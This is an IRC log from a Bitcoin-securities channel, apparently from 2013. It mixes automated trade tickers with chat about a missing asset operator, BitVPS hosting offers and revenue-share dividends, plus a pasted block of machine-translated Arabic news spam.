[LABCOIN] 1620 @ 0.001212 = 1.9634 BTC [-] Sep 24 14:29:45 [BTCTC] [COGNITIVE] 3 @ 0.1595 = 0.4785 BTC [+] {2} Sep 24 14:33:49 [MPEX] [S.MPOE] 5907 @ 0.00092586 = 5.4691 BTC [+] {2} Sep 24 14:34:50 [MPEX] [S.MPOE] 6393 @ 0.00092757 = 5.93 BTC [+] Sep 24 14:35:51 [MPEX] [S.MPOE] 14116 @ 0.00092794 = 13.0988 BTC [+] {3} Sep 24 14:35:51 [BTCTC] [LABCOIN] 700 @ 0.001206 = 0.8442 BTC [-] Sep 24 14:39:55 [BTCTC] [FN] [DMS.SELLING] 25 @ 0.00649996 = 0.1625 BTC [-] {2} Sep 24 14:42:58 [BTCTC] [LABCOIN] 1030 @ 0.00115248 = 1.1871 BTC [-] {5} Sep 24 14:49:34 ;;bc,stats Sep 24 14:49:36 Current Blocks: 259831 | Current Difficulty: 1.1262854866634709E8 | Next Difficulty At Block: 260063 | Next Difficulty In: 232 blocks | Next Difficulty In About: 1 day, 1 hour, 39 minutes, and 32 seconds | Next Difficulty Estimate: 146839916.73 | Estimated Percent Change: 30.3754 Sep 24 14:49:49 oooh 30 nao Sep 24 14:50:46 ;;calc 146*1.3*1.3 Sep 24 14:50:47 246.74 Sep 24 14:51:36 ;;calc 146*1.3*1.3*1.3 Sep 24 14:51:36 320.762 Sep 24 15:00:16 [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Sep 24 15:06:37 ;;calc 1.3**30 Sep 24 15:06:37 2619.99564365 Sep 24 15:10:26 [BTCTC] [LABCOIN] 870 @ 0.001158 = 1.0075 BTC [+] {2} Sep 24 15:13:29 [BTCTC] [LABCOIN] 45000 @ 0.00110954 = 49.9293 BTC [-] {22} Sep 24 15:15:31 [BTCTC] [LABCOIN] 10000 @ 0.00109953 = 10.9953 BTC [-] {6} Sep 24 15:16:32 [BTCTC] [LABCOIN] 5000 @ 0.00107538 = 5.3769 BTC [-] {7} Sep 24 15:18:34 [BTCTC] [LABCOIN] 5000 @ 0.00106028 = 5.3014 BTC [-] {2} Sep 24 15:19:35 [BTCTC] [LABCOIN] 5000 @ 0.00106 = 5.3 BTC [-] Sep 24 15:20:36 [BTCTC] [FN] [DMS.SELLING] 276 @ 0.0065 = 1.794 BTC [+] Sep 24 15:25:40 [BTCTC] [ASICMINER-PT] 11 @ 1.47463635 = 16.221 BTC [-] {6} Sep 24 15:27:42 [BTCTC] [ASICMINER-PT] 4 @ 1.471 = 5.884 BTC [-] {2} Sep 24 15:27:42 [HAVELOCK] [AM1] 18 @ 1.69147777 = 30.4466 BTC [+] {5} Sep 24 15:31:20 ;;bc,stats Sep 24 15:31:22 Current Blocks: 259836 | Current Difficulty: 1.1262854866634709E8 | Next Difficulty At Block: 260063 | Next Difficulty In: 227 blocks | Next Difficulty In About: 1 day, 2 hours, 34 minutes, and 32 seconds | Next Difficulty Estimate: 146854166.576 | Estimated Percent Change: 30.38805 Sep 24 15:32:47 [HAVELOCK] [SDSTM] 50 @ 0.00256 = 0.128 BTC [+] Sep 24 15:33:48 [BTCTC] [ACTIVEMINING] 5000 @ 0.0016782 = 8.391 BTC [-] {2} Sep 24 15:52:06 [HAVELOCK] [B] [XBOND] 1108 @ 0.0012 = 1.3296 BTC [-] {3} Sep 24 15:52:07 [HAVELOCK] [AM1] 2 @ 1.7 = 3.4 BTC [+] Sep 24 15:54:08 [HAVELOCK] [B] [XBOND] 788 @ 0.00114652 = 0.9035 BTC [-] {7} Sep 24 15:55:09 [HAVELOCK] [B] [XBOND] 298 @ 0.00114099 = 0.34 BTC [-] {4} Sep 24 15:59:14 [MPEX] [S.MPOE] 9900 @ 0.000924 = 9.1476 BTC [-] Sep 24 16:00:15 [HAVELOCK] [CBTC] 600 @ 0.00039978 = 0.2399 BTC [-] {4} Sep 24 16:04:19 [BTCTC] [ASICMINER-PT] 3 @ 1.47 = 4.41 BTC [-] {2} Sep 24 16:05:20 [BTCTC] [LABCOIN] 3200 @ 0.001157 = 3.7024 BTC [-] Sep 24 16:07:22 [BTCTC] [LABCOIN] 5048 @ 0.0010902 = 5.5033 BTC [-] {5} Sep 24 16:08:23 [BTCTC] [LABCOIN] 100 @ 0.001088 = 0.1088 BTC [-] Sep 24 16:10:25 [BTCTC] [LABCOIN] 100 @ 0.001088 = 0.1088 BTC [-] Sep 24 16:12:27 [BTCTC] [LABCOIN] 100 @ 0.001088 = 0.1088 BTC [-] Sep 24 16:14:29 [BTCTC] [LABCOIN] 200 @ 0.0010885 = 0.2177 BTC [+] {2} Sep 24 16:14:29 [BTCTC] [FN] [DMS.SELLING] 570 @ 0.00665876 = 3.7955 BTC [+] {3} Sep 24 16:16:31 [BTCTC] [FN] [DMS.SELLING] 750 @ 0.00676946 = 5.0771 BTC [+] {2} Sep 24 16:17:32 [BTCTC] [LABCOIN] 90 @ 0.00118561 = 0.1067 BTC [+] {4} Sep 24 16:18:33 [BTCTC] [LABCOIN] 804 @ 0.00119297 = 0.9591 BTC [+] {2} Sep 24 16:20:35 [HAVELOCK] [AM100] 17 @ 0.0149 = 0.2533 BTC [-] Sep 24 16:21:36 [BTCTC] [ASICMINER-PT] 2 @ 1.465 = 2.93 BTC [-] Sep 24 16:23:38 [BTCTC] [BTC-TRADING-PT] 12 @ 0.0221 = 0.2652 BTC [+] Sep 24 16:24:39 [BTCTC] [BTC-TRADING-PT] 6 @ 0.0221 = 0.1326 BTC [+] Sep 24 16:24:39 [BTCTC] [LABCOIN] 900 @ 0.00120199 = 1.0818 BTC [+] {4} Sep 24 16:27:44 ;;ticker Sep 24 16:27:44 MtGox BTCUSD ticker | Best bid: 133.30100, Best ask: 133.31100, Bid-ask spread: 0.01000, Last trade: 133.30100, 24 hour volume: 4105.10133628, 24 hour low: 132.50000, 24 hour high: 135.10493, 24 hour vwap: 133.81905 Sep 24 16:29:44 [BTCTC] [FN] [DMS.SELLING] 500 @ 0.00679939 = 3.3997 BTC [+] {3} Sep 24 16:35:50 [BTCTC] [ASICMINER-PT] 1 @ 1.463 BTC [-] Sep 24 16:36:23 ;;seen namworld Sep 24 16:36:24 namworld was last seen in #bitcoin-assets 3 days, 2 hours, 8 minutes, and 10 seconds ago: Hmm, well I'm off. Enough crazy reads for today. Sep 24 16:36:51 [HAVELOCK] [AM100] 20 @ 0.0149 = 0.298 BTC [-] Sep 24 16:36:52 [BTCTC] [ASICMINER-PT] 1 @ 1.453 BTC [-] Sep 24 16:36:52 [HAVELOCK] [HIM] 3 @ 0.17999998 = 0.54 BTC [-] Sep 24 16:37:51 [BTCTC] [ASICMINER-PT] 15 @ 1.45239999 = 21.786 BTC [-] {4} Sep 24 16:38:52 [BTCTC] [ASICMINER-PT] 2 @ 1.452 = 2.904 BTC [-] Sep 24 16:41:59 https://bitcointalk.org/index.php?topic=300776.0 Sep 24 16:42:05 How To Migrate Your ASICMINER-PT shares from BTCT to Havelock Sep 24 16:42:56 [BTCTC] [LABCOIN] 13220 @ 0.00120111 = 15.8787 BTC [-] {11} Sep 24 16:44:58 [BTCTC] [DMS.MINING] 124 @ 0.00127963 = 0.1587 BTC [-] {3} Sep 24 16:47:00 [BTCTC] [ASICMINER-PT] 1 @ 1.483 BTC [+] Sep 24 16:49:02 [BTCTC] [ASICMINER-PT] 1 @ 1.483 BTC [+] Sep 24 16:49:02 [BTCTC] [CRYPTO-TRADE] 3 @ 0.178 = 0.534 BTC [+] {3} Sep 24 16:50:03 [BTCTC] [ASICMINER-PT] 2 @ 1.455 = 2.91 BTC [-] Sep 24 16:52:05 [BTCTC] [COGNITIVE] 16 @ 0.16148749 = 2.5838 BTC [+] {5} Sep 24 16:53:06 [BTCTC] [LABCOIN] 670 @ 0.00111252 = 0.7454 BTC [-] {3} Sep 24 16:53:08 [BTCTC] [FN] [DMS.SELLING] 153 @ 0.0066 = 1.0098 BTC [-] Sep 24 16:55:06 Ugh? Sep 24 16:55:09 [MPEX] [S.MPOE] 3467 @ 0.00092455 = 3.2054 BTC [+] Sep 24 16:55:09 [BTCTC] [ASICMINER-PT] 2 @ 1.482 = 2.964 BTC [+] Sep 24 16:55:11 Wow I'm still connected Sep 24 16:55:13 inet OP Sep 24 16:56:10 [BTCTC] [ASICMINER-PT] 1 @ 1.483 BTC [+] Sep 24 16:57:01 Namworld has disappeared heh... Sep 24 16:57:11 [BTCTC] [ASICMINER-PT] 3 @ 1.496 = 4.488 BTC [+] Sep 24 16:58:26 you got baked well by nam Sep 24 17:00:45 baked well? Sep 24 17:00:47 what's that mean? Sep 24 17:01:08 or brendioed :D Sep 24 17:01:15 [BTCTC] [ASICMINER-PT] 4 @ 1.46075 = 5.843 BTC [-] {2} Sep 24 17:04:18 [BTCTC] [ASICMINER-PT] 1 @ 1.499 BTC [+] Sep 24 17:04:42 namworld is a new scammah? Sep 24 17:06:01 or ianized Sep 24 17:06:25 unlikely Namworld is scamming Sep 24 17:06:47 What sec doesn Namworld run? Sep 24 17:06:57 BitVPS Sep 24 17:07:03 he has a bind Sep 24 17:07:06 bond* Sep 24 17:07:12 a MPOE PT Sep 24 17:07:15 and a BBET PT Sep 24 17:07:21 [BTCTC] [ASICMINER-PT] 2 @ 1.498 = 2.996 BTC [-] {2} Sep 24 17:07:47 thestringpuller, put up a bitbet. :) Sep 24 17:07:54 i haven't been able to get in contact wtih him for the last 2-3 weeks Sep 24 17:07:59 i think he's done a ziggap Sep 24 17:08:04 free money for namworld Sep 24 17:08:16 ^ that's the joke. Sep 24 17:08:22 [BTCTC] [LABCOIN] 1500 @ 0.00114753 = 1.7213 BTC [+] {4} Sep 24 17:09:03 speaking of which Sep 24 17:09:06 where is namworld anyhow Sep 24 17:09:36 done a runner or something, noone can get in contact wtih him Sep 24 17:09:53 well Sep 24 17:09:57 its not like he can do anything Sep 24 17:10:00 dont blame him for ragequitting Sep 24 17:10:20 btc-mining will never get its money back from amazingrando Sep 24 17:10:24 [BTCTC] [BASIC-MINING] 11 @ 0.08011 = 0.8812 BTC [-] {3} Sep 24 17:10:24 [BTCTC] [ASICMINER-PT] 2 @ 1.499 = 2.998 BTC [+] Sep 24 17:11:25 [BTCTC] [BASIC-MINING] 4 @ 0.08011 = 0.3204 BTC [-] Sep 24 17:13:27 [BTCTC] [ACTIVEMINING] 2000 @ 0.001601 = 3.202 BTC [-] Sep 24 17:14:07 yeah dont blame an idiot for being an idiot Sep 24 17:14:09 O_O Sep 24 17:14:14 blame yourself! Sep 24 17:14:18 O_o Sep 24 17:14:44 butbut... what if yourself is an idiot? Sep 24 17:15:08 happens all the time Sep 24 17:16:30 [BTCTC] [ASICMINER-PT] 3 @ 1.49933333 = 4.498 BTC [+] {2} Sep 24 17:16:49 Bitfunder is next Sep 24 17:16:51 we need a new bitbet Sep 24 17:17:09 i think there's on there Sep 24 17:17:15 well waiting for approval anyway Sep 24 17:17:43 "The Blood Runneth Over" Sep 24 17:18:30 Bitfunder is next << ? Sep 24 17:18:37 what's the drama there? Sep 24 17:22:36 [HAVELOCK] [AM100] 10 @ 0.0149 = 0.149 BTC [-] Sep 24 17:23:38 " BitFunder will close down in a years time." Sep 24 17:23:44 there is no drama mang Sep 24 17:23:47 Betting is awesome! Sep 24 17:23:56 Oh how I love this channel. Sep 24 17:24:13 [16:09:35] done a runner or something, noone can get in contact wtih him // Nameworld ? really ? Sep 24 17:25:08 at this point i'd say some people just like to spread panic Sep 24 17:25:36 but if we won't see anything from namworld in 2-3 days, then it's true Sep 24 17:25:58 well smickles pretty much died Sep 24 17:26:03 but he's def. not a scammer Sep 24 17:26:17 People always call people who retire from the game scammors Sep 24 17:26:37 meh, don't think this is true Sep 24 17:26:40 [HAVELOCK] [CBTC] 827 @ 0.00035503 = 0.2936 BTC [-] {2} Sep 24 17:26:57 only if you retire unclean Sep 24 17:28:39 Depends on the ethical implications in my honest opinions. Despite thieves being seen as criminals, I would say a thief stealing an insured diamond in a well planned heist, deserve their payout. Sep 24 17:28:41 [HAVELOCK] [CBTC] 18173 @ 0.00035343 = 6.4229 BTC [-] {5} Sep 24 17:28:42 [BTCTC] [ASICMINER-PT] 14 @ 1.52614285 = 21.366 BTC [+] {3} Sep 24 17:29:19 work is work, I seriously wonder why there isn't more sabotage in BTC world Sep 24 17:29:42 [BTCTC] [BASIC-MINING] 3 @ 0.08409333 = 0.2523 BTC [+] {2} Sep 24 17:30:43 [HAVELOCK] [AM100] 19 @ 0.01444842 = 0.2745 BTC [-] {2} Sep 24 17:31:45 thestringpuller, there isn't? Sep 24 17:32:09 نيروبي - بعد ظهر يوم السبت عندما اقتحم المهاجمون مركز التسوق ستغت في نيروبي، ان الفوضى عمت المكان في غضون ثوان. ركض الناس على حياتهم والجرحى والقتلى ملقاة على الأرض، رن مرارا رشقات نارية من أسلحة رشاشة. شهود عيان الذين يمكن الهروب من هذا Sep 24 17:32:11 الكابوس، تقدم في تقاريرها سوى الفتات من الوضع. ولكن الآن أن الدراما رهينة تسحب في اليوم الرابع، الحسابات من الناجين لديهم استنتاج واحد على الأقل: تحولت المهاجمين متعددة في اللغة الإنجليزية للزوار مول خائفا وهذا على ما يبدو للسيطرة جيدة. Sep 24 17:32:14 Sep 24 17:32:16 DISPLAY Sep 24 17:32:18 <لغة البرنامج النصي = 'JavaScript1.1' Sep 24 17:32:20 بطبيعة الحال، يتم تدريس اللغة الإنجليزية والتحدث بها في أفريقيا. ومع ذلك، مقابلة وزير الخارجية الكيني امينة محمد يغذي التخمين، التي تنص على الأجانب مع أو بدون جذور الصومالية، شاركوا في الهجوم يمكن. Sep 24 17:32:27 ugh Sep 24 17:32:39 fucking unicode characters Sep 24 17:32:40 my god Sep 24 17:32:46 its arabic Sep 24 17:33:01 only the US government uses arabic anymore =/ Sep 24 17:33:03 damned spooks Sep 24 17:36:49 [BTCTC] [DMS.MINING] 133 @ 0.001204 = 0.1601 BTC [-] Sep 24 17:37:00 Hisb0hla. Subtle. Sep 24 17:37:50 [BTCTC] [DMS.MINING] 867 @ 0.00120061 = 1.0409 BTC [-] {2} Sep 24 17:40:37 jurov: he probably chose to take a few days off at the worst possible time Sep 24 17:40:53 yes, like TAT Sep 24 17:41:37 and I owe him $$.$$$, why wouldnt he ask for it if he was scammin' Sep 24 17:42:00 Scrat, cause he got way more Sep 24 17:42:18 to make you his accomplice Sep 24 17:42:37 he'll be back Sep 24 17:43:57 [BTCTC] [ASICMINER-PT] 2 @ 1.4835 = 2.967 BTC [-] {2} Sep 24 17:44:58 [BTCTC] [ASICMINER-PT] 1 @ 1.509 BTC [+] Sep 24 17:47:00 [BTCTC] [FN] [DMS.SELLING] 1000 @ 0.00646219 = 6.4622 BTC [-] {6} Sep 24 17:47:16 BTCTC recession! Sep 24 17:47:20 Liquidate yo assets Sep 24 17:47:22 hide your btc Sep 24 17:53:06 [BTCTC] [ASICMINER-PT] 6 @ 1.49983333 = 8.999 BTC [-] {2} Sep 24 17:56:09 [BTCTC] [ASICMINER-PT] 10 @ 1.51 = 15.1 BTC [+] Sep 24 17:58:11 [BTCTC] [ASICMINER-PT] 3 @ 1.53 = 4.59 BTC [+] Sep 24 18:12:31 BitVPS will come through this Sep 24 18:12:36 just fine Sep 24 18:12:37 :-) Sep 24 18:12:52 heck of a deal on our shares now, all things considered Sep 24 18:13:47 I've been using a lot of BitVPS lately lolol Sep 24 18:13:53 I'm about to buy another instance Sep 24 18:18:43 are there plans for low-priced tiers? i.e. lowendbox stuff Sep 24 18:19:24 sure are Sep 24 18:19:26 OpenVZ Sep 24 18:19:27 :-) Sep 24 18:19:31 hmm… I probably wouldn't use them anyway. I like EU servers with a *lot* of bandwidth Sep 24 18:19:46 we have a Switzerland node but it's probably not super high bandwidth Sep 24 18:19:56 someday we'll expand into EU a little more Sep 24 18:20:39 I wonder if getting featured on lowendbox is worth it. You're getting a lot of users which might actually ruin you support wise Sep 24 18:21:01 also openvpn is annoying, lack of tun/tap at least Sep 24 18:22:33 we can do tun/tap Sep 24 18:22:35 on openvz Sep 24 18:22:38 you just havwe to ask Sep 24 18:22:56 and I don't think we're on lowend box Sep 24 18:23:04 my main use is making my own vpn with dedicated IPv4 and 6, with at least 4 TB of traffic. not very common (by EDIS has the right plans for me) :) Sep 24 18:23:08 we try to not advertise too much due to the support load Sep 24 18:23:19 lowendbox is like lower than $7/mo I think Sep 24 18:23:37 I like your SSD offerings though, they seem quite competitive Sep 24 18:24:42 pankkake: what business do you run Sep 24 18:24:45 those are new for us, actually Sep 24 18:24:48 the SSDs Sep 24 18:24:54 cookiechief.com is running on bitvps and I have no problem Sep 24 18:24:56 thestringpuller: the pankkake business of doing nothing Sep 24 18:25:05 haven't launched fully yet but it runs quick Sep 24 18:25:09 for little traffic Sep 24 18:25:33 we've had our issues like any hosting company but we're at least trying to be responsive to customers. :-) Sep 24 18:25:57 thestringpuller: I'm a developer/sysadmin, but I am spending a lot of my time seeing doctors right now :/ Sep 24 18:26:07 pankkake, the openvzs start at $5/mo Sep 24 18:26:09 phungus: do you think you'll use openstack at some point Sep 24 18:26:12 those prices are quarterly Sep 24 18:26:18 oooh Sep 24 18:26:22 dumb me Sep 24 18:26:24 the ssds are monthly Sep 24 18:26:27 yea it's like 4 dollars a month Sep 24 18:26:30 no, everyone thinks they are monthly lol Sep 24 18:26:32 for openvz Sep 24 18:26:32 :( Sep 24 18:26:35 maybe you should state them as per month too Sep 24 18:26:46 even sites that are yearly show the average per month Sep 24 18:27:14 nakowa playing on just-dice.com right now Sep 24 18:27:19 winning another 5000BTC Sep 24 18:27:37 damn Sep 24 18:28:41 [BTCTC] [ACTIVEMINING] 299 @ 0.0016 = 0.4784 BTC [-] {2} Sep 24 18:28:51 thestringpuller: I would love to do Openstack. I work with it at my dayjob a lot. :-) Sep 24 18:29:07 it takes significant resources to make a fully viable production environment work though Sep 24 18:29:11 and then add in BTC billing... Sep 24 18:29:25 Yea I feel you I'm just wondering because I love openstack Sep 24 18:29:41 we used redhat vm's but we outscaled that at the CC processor I worked at Sep 24 18:29:42 [BTCTC] [FN] [BTC-GROWTH] 10 @ 0.074019 = 0.7402 BTC [-] {2} Sep 24 18:29:52 so they were in the process of migrating to openstack for internal vm distribution Sep 24 18:30:43 [BTCTC] [COGNITIVE] 1 @ 0.1423 BTC [-] Sep 24 18:30:47 you don't have to offer all openstack services right away, right? you could do the storage part first, for example Sep 24 18:31:00 god Openstack storage is so sexy Sep 24 18:31:22 Cinder Sep 24 18:31:30 :-) Sep 24 18:31:44 I'm still waiting for the services that will let me store 10 TB without being worth ten times the price of physical drives that I can move myself Sep 24 18:32:23 BitVPS would *really* like to have a competitive, and automated, and reliable storage solution Sep 24 18:32:29 I want a big honkin NetApp Sep 24 18:32:34 or a SAN or something Sep 24 18:32:39 $$$ though Sep 24 18:33:04 we've been looking Sep 24 18:33:08 we're just not there yet Sep 24 18:33:19 phungus: you're bitVPS? Sep 24 18:34:01 phungus: can you match Cinfu's pricing? Sep 24 18:35:16 [10:40] jurov: he probably chose to take a few days off at the worst possible time Sep 24 18:35:16 [10:40] yes, like TAT Sep 24 18:35:27 who namworld? Sep 24 18:35:28 :/ Sep 24 18:35:29 Yeah I had this trip planned for a while, shitty timing Sep 24 18:35:48 but I'll be working from the Amsterdam coffee shops too, don't worry Sep 24 18:36:36 lol.. with a joint, too? Sep 24 18:36:40 catssaymeow: not sure? I've never looked at Cinfu Sep 24 18:36:49 [BTCTC] [LABCOIN] 181 @ 0.001214 = 0.2197 BTC [-] {2} Sep 24 18:36:54 catssaymeow: Arij and I are both with BitVPS Sep 24 18:36:58 Me, do drugs? Never. Sep 24 18:37:06 but hookers are OK Sep 24 18:37:39 oh, marijuana is not a drug Sep 24 18:37:49 [BTCTC] [LABCOIN] 88 @ 0.001215 = 0.1069 BTC [+] Sep 24 18:38:18 phungus: 4GB/200GB/unlimited data / 4cores / $25 /month -- http://www.cinfu.com/vps/ Sep 24 18:38:23 or, if you insist, it's much less so than booze Sep 24 18:38:50 [BTCTC] [LABCOIN] 1153 @ 0.0012164 = 1.4025 BTC [+] {2} Sep 24 18:38:55 phungus: if you can match that i'll use you.. Sep 24 18:39:51 [BTCTC] [LABCOIN] 392 @ 0.001245 = 0.488 BTC [+] Sep 24 18:40:14 or coffee Sep 24 18:40:52 [BTCTC] [LABCOIN] 2455 @ 0.00124584 = 3.0585 BTC [+] {2} Sep 24 18:40:53 [BTCTC] [DMS.MINING] 1400 @ 0.00133155 = 1.8642 BTC [+] {5} Sep 24 18:41:54 [BTCTC] [LABCOIN] 392 @ 0.001279 = 0.5014 BTC [+] Sep 24 18:41:54 [BTCTC] [FN] [DMS.SELLING] 1400 @ 0.00686792 = 9.6151 BTC [+] {4} Sep 24 18:42:55 [BTCTC] [LABCOIN] 3404 @ 0.00128076 = 4.3597 BTC [+] {4} Sep 24 18:42:55 [BTCTC] [BTC-TRADING-PT] 5 @ 0.0224 = 0.112 BTC [+] {2} Sep 24 18:44:57 [BTCTC] [LABCOIN] 784 @ 0.001334 = 1.0459 BTC [+] {2} Sep 24 18:45:58 [BTCTC] [LABCOIN] 2000 @ 0.0013496 = 2.6992 BTC [+] {2} Sep 24 18:45:58 [BTCTC] [DMS.MINING] 99 @ 0.001201 = 0.1189 BTC [-] Sep 24 18:45:58 [BTCTC] [ESECURITYSABTC] 1 @ 0.1499 BTC [+] Sep 24 18:48:00 [BTCTC] [LABCOIN] 392 @ 0.001348 = 0.5284 BTC [-] Sep 24 18:49:01 [BTCTC] [LABCOIN] 575 @ 0.00135063 = 0.7766 BTC [+] {2} Sep 24 18:50:02 [BTCTC] [LABCOIN] 1330 @ 0.001352 = 1.7982 BTC [+] {2} Sep 24 18:50:02 [BTCTC] [DMS.MINING] 146 @ 0.00110706 = 0.1616 BTC [-] {2} Sep 24 18:52:04 [BTCTC] [LABCOIN] 500 @ 0.00134956 = 0.6748 BTC [-] {2} Sep 24 18:53:05 [BTCTC] [LABCOIN] 5854 @ 0.00136512 = 7.9914 BTC [+] {5} Sep 24 18:54:06 [BTCTC] [LABCOIN] 862 @ 0.00138313 = 1.1923 BTC [+] {3} Sep 24 18:54:06 [BTCTC] [BASIC-MINING] 7 @ 0.08001571 = 0.5601 BTC [-] {2} Sep 24 18:55:07 [BTCTC] [BITVPS] 132 @ 0.0013 = 0.1716 BTC [+] Sep 24 18:56:08 [BTCTC] [COGNITIVE] 4 @ 0.1423 = 0.5692 BTC [-] Sep 24 18:57:09 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1504 = 0.3008 BTC [-] Sep 24 18:57:09 [BTCTC] [LABCOIN] 284 @ 0.001348 = 0.3828 BTC [-] Sep 24 18:59:11 [BTCTC] [PAJKA.BOND] 25 @ 0.009 = 0.225 BTC [-] Sep 24 19:00:12 [BTCTC] [LABCOIN] 240 @ 0.00137953 = 0.3311 BTC [+] {2} Sep 24 19:04:16 [BTCTC] [BASIC-MINING] 160 @ 0.07911599 = 12.6586 BTC [-] {5} Sep 24 19:07:17 pankkake: would be interested to hear what flaws you are talking about in your forum reply (flaws in our contract? or flaws in the BTCT contract?) Sep 24 19:07:21 PM me please Sep 24 19:07:46 it's the ones stated by the ltc-global moderators Sep 24 19:07:57 so very public :) Sep 24 19:08:30 erm Sep 24 19:08:31 hmm Sep 24 19:08:37 I don't see how we're connected to ltc-global Sep 24 19:09:25 weird it disappeared. it was the something like "shareholders do not own the company assets" Sep 24 19:09:38 oh Sep 24 19:09:43 our listing is different Sep 24 19:09:49 I don't think shareholders own our assets Sep 24 19:09:53 we distribute dividends Sep 24 19:09:57 so they are entitled to profits Sep 24 19:09:59 that's it Sep 24 19:10:04 yes, that's specifically the issue Sep 24 19:10:07 why wouldn't they? Sep 24 19:10:10 umm Sep 24 19:10:14 because of the type of security Sep 24 19:10:34 investment in our security entitles shareholders to profits Sep 24 19:10:36 but not assets Sep 24 19:10:50 because we're funding our hardware, etc Sep 24 19:10:55 not shareholders Sep 24 19:11:05 I think Sep 24 19:11:09 I see Sep 24 19:11:23 [BTCTC] [LABCOIN] 100 @ 0.001215 = 0.1215 BTC [-] Sep 24 19:11:24 [BTCTC] [FN] [DMS.SELLING] 1300 @ 0.0066169 = 8.602 BTC [-] {3} Sep 24 19:12:24 [BTCTC] [ACTIVEMINING] 214 @ 0.0016 = 0.3424 BTC [-] Sep 24 19:15:04 I removed my comment, but perhaps it should be clarified Sep 24 19:15:33 cool, I will see about getting that clarification in but I'm pretty sure it's on BTCT already Sep 24 19:15:52 REVENUE SHARE: BITVPS Sep 24 19:15:54 yep Sep 24 19:16:03 Revenue Share is just that Sep 24 19:16:06 a share of revenues Sep 24 19:16:07 :-) Sep 24 19:16:11 so, dividends Sep 24 19:16:28 [BTCTC] [ASICMINER-PT] 1 @ 1.491 BTC [-] Sep 24 19:18:31 [BTCTC] [ASICMINER-PT] 6 @ 1.49016666 = 8.941 BTC [-] {2} Sep 24 19:19:32 [BTCTC] [FN] [DMS.SELLING] 200 @ 0.00660665 = 1.3213 BTC [-] {2} Sep 24 19:21:33 [BTCTC] [LABCOIN] 7344 @ 0.00120124 = 8.8219 BTC [-] {5} Sep 24 19:23:35 [HAVELOCK] [AM100] 10 @ 0.0149 = 0.149 BTC [+] Sep 24 19:29:41 [BTCTC] [FN] [BTC-GROWTH] 102 @ 0.07778558 = 7.9341 BTC [+] {2} Sep 24 19:30:42 [HAVELOCK] [AM100] 20 @ 0.0149 = 0.298 BTC [+] Sep 24 19:32:44 [BTCTC] [PAJKA.BOND] 63 @ 0.009905 = 0.624 BTC [+] Sep 24 19:32:45 So labcoin just paid divs Sep 24 19:32:54 (small) I know Sep 24 19:33:45 [BTCTC] [PAJKA.BOND] 172 @ 0.00992512 = 1.7071 BTC [+] {2} Sep 24 19:34:46 [BTCTC] [ACTIVEMINING] 7944 @ 0.00163432 = 12.983 BTC [+] {6} Sep 24 19:35:27 expensive PMB Sep 24 19:35:47 [BTCTC] [ACTIVEMINING] 2999 @ 0.001684 = 5.0503 BTC [+] Sep 24 19:37:49 [BTCTC] [LABCOIN] 7001 @ 0.00134251 = 9.3989 BTC [+] {6} Sep 24 19:38:55 DIV's! Sep 24 19:39:00 \o/ Sep 24 19:39:51 [BTCTC] [BTC-BOND] 1424 @ 0.00946338 = 13.4759 BTC [+] {7} Sep 24 19:39:51 [BTCTC] [LABCOIN] 400 @ 0.001337 = 0.5348 BTC [-] Sep 24 19:42:26 Besides messaging burnside on bitcointalk, is there any other way to get in contact with him? I know he is really busy with all the stuff going on right now =( Sep 24 19:42:54 [BTCTC] [LABCOIN] 110 @ 0.0013249 = 0.1457 BTC [-] {2} Sep 24 19:43:55 [BTCTC] [RSM] 22 @ 0.00584645 = 0.1286 BTC [+] {3} Sep 24 19:45:57 [BTCTC] [LABCOIN] 1470 @ 0.001324 = 1.9463 BTC [-] {3} Sep 24 19:46:58 [BTCTC] [LABCOIN] 101 @ 0.001324 = 0.1337 BTC [-] {2} Sep 24 19:47:55 no, that is the best way I have found Sep 24 19:48:22 he normally does not respond until about 5 hours from now Sep 24 19:48:27 !ticker btctc LABCOIN Sep 24 19:48:29 [BTCT:LABCOIN] 1D: 0.00106 / 0.00124 / 0.001499 (373822 shares, 461.7 BTC), 7D: 0.00025 / 0.00178 / 0.003 (5736827 shares, 10200.7 BTC), 30D: 0.00025 / 0.00257 / 0.003989 (14357013 shares, 36965.3 BTC) Sep 24 19:48:39 lol Sep 24 19:48:52 that descended quickly.... Sep 24 19:49:00 [BTCTC] [LABCOIN] 101 @ 0.00132375 = 0.1337 BTC [-] {2} Sep 24 19:51:02 [BTCTC] [ASICMINER-PT] 2 @ 1.509 = 3.018 BTC [+] Sep 24 19:54:05 [BTCTC] [ACTIVEMINING] 1137 @ 0.00157858 = 1.7948 BTC [-] {4} Sep 24 19:54:51 ? Sep 24 19:55:06 [BTCTC] [BTC-BOND] 500 @ 0.009 = 4.5 BTC [-] Sep 24 19:58:09 [BTCTC] [LABCOIN] 1801 @ 0.00124016 = 2.2335 BTC [-] {3} Sep 24 20:03:14 [BTCTC] [BTC-BOND] 1400 @ 0.00831428 = 11.64 BTC [-] {5} Sep 24 20:05:16 [BTCTC] [BTC-BOND] 100 @ 0.008 = 0.8 BTC [-] Sep 24 20:07:18 [BTCTC] [B.YABMC] 881 @ 0.000145 = 0.1277 BTC [-] Sep 24 20:08:19 [MPEX] [S.MPOE] 1900 @ 0.00092746 = 1.7622 BTC [+] Sep 24 20:09:37 hi there Sep 24 20:10:22 it's a long time I don't write and I have a little question to pose Sep 24 20:15:26 [HAVELOCK] [AM100] 7 @ 0.0149 = 0.1043 BTC [+] Sep 24 20:18:30 [HAVELOCK] [SDSTM] 40 @ 0.00256 = 0.1024 BTC [+] Sep 24 20:18:31 [BTCTC] [LABCOIN] 5667 @ 0.00129894 = 7.3611 BTC [-] {2} Sep 24 20:23:35 [HAVELOCK] [HIM] 25 @ 0.179 = 4.475 BTC [-] Sep 24 20:23:45 I've tried to crawl the forums but still I have one doubt on satoshi dice stocks Sep 24 20:24:56 I'm a little ashamed to ask but could someone please tell me what can I do with my stocks on my account? Sep 24 20:25:19 my satoshi dice stocks I mean Sep 24 20:25:37 [HAVELOCK] [HIM] 35 @ 0.17999998 = 6.3 BTC [+] Sep 24 20:26:38 [BTCTC] [LABCOIN] 90 @ 0.001319 = 0.1187 BTC [+] Sep 24 20:27:34 on what account is that gabridome Sep 24 20:27:44 SD is no longer publically traded or listed Sep 24 20:28:35 yeah, I know I have received dividends but I have still stocks in my apex account Sep 24 20:28:40 [HAVELOCK] [AM1] 1 @ 1.7599999 BTC [+] Sep 24 20:28:41 [HAVELOCK] [CFIG] 1 @ 0.1358 BTC [+] Sep 24 20:28:42 [BTCTC] [FN] 